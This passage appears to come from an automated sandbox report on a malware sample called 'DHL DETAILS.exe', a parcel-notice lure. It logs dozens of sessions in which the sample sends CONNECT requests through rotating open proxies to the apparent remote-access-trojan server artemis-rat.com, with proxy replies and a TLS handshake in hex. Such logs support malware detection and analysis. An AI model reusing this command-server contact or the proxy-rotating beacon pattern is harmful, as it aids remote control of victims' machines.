                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    802192.168.2.55161466.84.6.21626456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.467226028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536427021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630259037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.629947901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    803192.168.2.549909189.240.60.17190906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.472489119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536422014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.034794092 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    804192.168.2.552573211.222.252.18781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.476938009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    805192.168.2.552537177.12.118.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.477370024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    806192.168.2.552580170.245.57.22880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.477888107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    807192.168.2.55246489.218.8.15210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.479882002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    808192.168.2.552642129.213.150.20580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.482552052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    809192.168.2.552667104.129.205.94543216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.482861996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.686809063 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.2


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    810192.168.2.549912195.177.217.131528586352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.483021021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.552359104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    811192.168.2.552711162.159.242.150806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.483182907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.644088984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    812192.168.2.55252445.227.193.16680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.483369112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.703857899 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    813192.168.2.552680162.241.6.97456296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.483683109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.067524910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    814192.168.2.55254752.67.10.18331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.483690023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.809869051 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    815192.168.2.552363122.114.232.1378086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.486063004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    816192.168.2.55257598.162.25.7316536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.488938093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    817192.168.2.552541167.172.86.46104716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.489191055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    818192.168.2.55259272.210.252.13741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.490087032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    819192.168.2.55258498.170.57.24941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.490104914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    820192.168.2.552749172.67.53.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.490753889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.644988060 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    821192.168.2.55035945.118.132.180454496352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.491450071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    822192.168.2.552762192.154.244.9290006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.492080927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    823192.168.2.552757184.169.154.119806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.492921114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.667004108 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:15.670845032 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 96 87 20 a5 a2 58 eb 30 97 a7 f6 1b 53 cf d5 c9 b6 04 92 47 ee 0e c5 53 0c c6 a3 39 7a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheR X0SGS9z*,+0/$#('=<5/artemis-rat.com#ZlyEc>3fevz+e*j{yh(Z01|h"*3|
                                                                                    Mar 9, 2024 13:14:15.845057011 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 6e 0c 3b a0 88 64 cd 85 31 4a 35 c0 dd c0 a6 31 b1 ca 10 bc 91 8f a8 db 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9n;d1J51DOWNGRD0000*H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0*H0";dJJH
                                                                                    Mar 9, 2024 13:14:16.060262918 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b5 88 9e be ee a3 b8 86 33 0e da c1 5f 5d 1a 44 1c 5e ff 82 15 df 46 a5 75 b8 26 91 ad 1b ff 1c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 53 10 ce f5 e0 e1 d3 a2 c5 55 64 85 1f 5a 0f d1 08 d4 4b 6f d6
                                                                                    Data Ascii: %! 3_]D^Fu&(SUdZKoG0eLX1
                                                                                    Mar 9, 2024 13:14:16.233038902 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b3 75 19 89 37 6d aa e9 84 52 0d 39 f8 ef f6 fa ee 1f 97 94 72 d7 05 66 1a 21 8a ec 25 bf a7 69 3e bc 53 92 a7 69 15 8f
                                                                                    Data Ascii: (u7mR9rf!%i>Si


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    824192.168.2.552694198.12.255.193532816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.492922068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.067527056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781347036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.102200031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.703676939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.270781040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.859888077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.045876980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    825192.168.2.552744192.163.200.196595596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.493892908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.973695993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536968946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724195957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038845062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.333203077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.630059004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    826192.168.2.552340117.160.250.13388996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.498596907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.122714043 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    827192.168.2.551647184.178.172.1441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.498823881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    828192.168.2.550037104.236.0.129221676352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
